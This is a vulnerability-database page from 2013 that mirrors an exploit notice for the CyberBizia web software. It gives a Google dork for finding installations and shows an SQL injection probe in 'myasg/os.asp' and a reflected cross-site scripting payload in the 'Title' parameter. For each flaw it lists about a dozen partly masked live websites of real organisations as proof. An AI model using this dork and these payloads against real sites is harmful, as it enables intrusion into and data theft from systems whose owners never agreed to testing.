CyberBizia Multiple Vulnerabilites

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1044549 漏洞类型
发布时间 2013-08-29 更新时间 2013-08-29
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2013080232
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
 #********************************************************************************
# Exploit Title : CyberBizia Multiple Vulnerabilites
#
# Software link : http://www.cyberbizia.com
#
# Exploit Author : Ashiyane Digital Security Team
#
# Tested on: Windows 7 , Linux
#
# Google Dork :  intext:"Powered by CyberBizia"
#
# Date: 2013/08/29
#
--------------------------------------------------------------------
# Exploit 1 : Sql Inkection
#
# Location : [Target]/myasg/os.asp?elenca=mese&mese=[Sql Injection]
#
#
# Proof:
#
# http://www.advancXXXiology.it/myasg/os.asp?elenca=mese&mese=1'

#


# http://www.artiXXXri.com/myasg/os.asp?elenca=mese&mese=1'
#
# http://www.basketXXXtu.it/myasg/os.asp?elenca=mese&mese=1'
#
# http://www.cdsdonXXXliari.it/myasg/os.asp?elenca=mese&mese=1'
#
# http://www.digXXXt.it/myasg/os.asp?elenca=mese&mese=1'
#
# http://www.cosXXXo.com/myasg/os.asp?elenca=mese&mese=1'
#
# http://www.cdsdXXXecagliari.it/myasg/os.asp?elenca=mese&mese=1'
#
# http://www.baskXXXrtu.it/myasg/os.asp?elenca=mese&mese=1'
#
# http://www.immobiXXXacanze.it/myasg/os.asp?elenca=mese&mese=1'
#
# http://www.magXXweb.it/myasg/os.asp?elenca=mese&mese=1'
#
# http://www.archXXXeno.it/myasg/os.asp?elenca=mese&mese=1'
--------------------------------------------------------------------
# Exploit 2 :
#
# Location : [Target]t/?Title=[xss]
#
#
# Proof:
#
# http://www.advaXXXdiology.it/?Title="/><script>alert(1);</script>

#


# http://www.artXri.com/?Title="/><script>alert(1);</script>
#
# http://www.basketquartXXu.it/?Title="/><script>alert(1);</script>
#
# http://www.cdsdonnXXXecagliari.it/?Title="/><script>alert(1);</script>
#
# http://www.digicsXXoft.it/?Title="/><script>alert(1);</script>
#
# http://www.costiaXXXuto.com/?Title="/><script>alert(1);</script>
#
# http://www.cdsdonXXnecagliari.it/?Title="/><script>alert(1);</script>
#
# http://www.baskXXuartu.it/?Title="/><script>alert(1);</script>
#
# http://www.iXXXarevacanze.it/?Title="/><script>alert(1);</script>
#
# http://www.mozXXXna.com/?Title="/><script>alert(1);</script>
#
# http://www.aXXXXXXleno.it/?Title="/><script>alert(1);</script>
#
######################
discovered by : ACC3SS
######################